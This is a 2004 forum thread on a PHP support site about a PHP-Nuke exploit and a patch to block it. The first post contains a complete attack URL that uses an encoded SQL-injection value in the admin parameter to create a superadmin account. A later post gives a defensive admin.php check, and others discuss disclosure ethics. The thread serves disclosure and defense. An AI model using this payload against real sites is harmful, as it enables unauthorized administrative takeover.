Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
Author Message
ballymuntrev
Hangin' Around



Joined: Mar 22, 2004
Posts: 49

PostPosted: Fri Apr 30, 2004 11:32 am Reply with quote

I'm so fecked off with Nuke, every day there's a new exploit or an update to an old exploit Sad

Here's another one, fairly bad this time.

Raven m8, any chance you can update your HackAttempt script to catch and stop it please dude ?!?

Code:
http://yoursite.blah/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo bar com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox



Cheers,

Trev
 
View user's profile Send private message Visit poster's website
ballymuntrev







PostPosted: Fri Apr 30, 2004 11:38 am Reply with quote

For anyone else, edit your admin.php file and add the following...


Code:
if(stristr($_SERVER["QUERY_STRING"],'AddAuthor') || stristr($_SERVER["QUERY_STRING"],'UpdateAuthor')) {

$loc = $_SERVER['QUERY_STRING'];
header("Location: hackattempt.php?$loc");
die();
}


Thanks Raven for that, and Chatserv for the code too.
 
GanjaUK
Life Cycles Becoming CPU Cycles



Joined: Feb 14, 2004
Posts: 633
Location: England

PostPosted: Fri Apr 30, 2004 12:01 pm Reply with quote

I dont think its such a good idea to post the actual exploit here if thats what it is.
I tried that exploit on my site and it just returns: Illegal Operation

_________________
Image
Need a quality custom theme designed? PM me!
 
View user's profile Send private message Visit poster's website
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Fri Apr 30, 2004 12:08 pm Reply with quote

That exploit is published everywhere already since it is not new. That's common code by now. I understand your caution and I appreciate it, but really, in this case, I can't see it causing any harm.
 
View user's profile Send private message
Maku
New Member
New Member



Joined: Sep 24, 2003
Posts: 15
Location: Estonia

PostPosted: Fri Apr 30, 2004 3:35 pm Reply with quote

You can read about grand new coppermine exploit at here [ Only registered users can see links on this board! Get registered or login! ] and this one very serious. Right now you can only secue your site when you reaname coppermine directory or delete it. I hope some one found fix soon Mad
 
View user's profile Send private message Visit poster's website MSN Messenger
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496

PostPosted: Fri Apr 30, 2004 4:00 pm Reply with quote

Coppermine has a reliable support team I'm sure they'll rewrite and release asap.
 
View user's profile Send private message
ladysilver
Hangin' Around



Joined: May 03, 2004
Posts: 49
Location: Cyberspace

PostPosted: Mon May 03, 2004 12:28 pm Reply with quote

I don't use Coppermine, but I've had the exploit attempted at one of my sites anyway. I have to wonder about the mentality of somebody who attempts this attack since the attacker's URL is part of the query string.
 
View user's profile Send private message Visit poster's website ICQ Number
Raven







PostPosted: Mon May 03, 2004 12:40 pm Reply with quote

Hey LS! Good to see you. I really appreciate your 'candor' when posting.
 
ladysilver







PostPosted: Mon May 03, 2004 2:18 pm Reply with quote

Thanks for the good words, Raven. Lol, my goal is 'diplomatic candor', but occasionally I forget. Very Happy
 
ballymuntrev







PostPosted: Thu May 06, 2004 4:41 pm Reply with quote

Sorry if I upset anyone by posting the exploit but I'm always of the thinking that if an exploit is not published then the community cannot fix them quickly. As it turned out it was an oldish exploit (to me though it was new news) and Chatserv had already released a fix for it, thankfully.
 
sixonetonoffun







PostPosted: Thu May 06, 2004 5:30 pm Reply with quote

I don't think we can shoot the messenger. Well at least as long as the messengers polite Mr. Green
 
ballymuntrev







PostPosted: Thu May 06, 2004 5:39 pm Reply with quote

I'm always polite, even when I've been shot at with real bullets Laughing
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©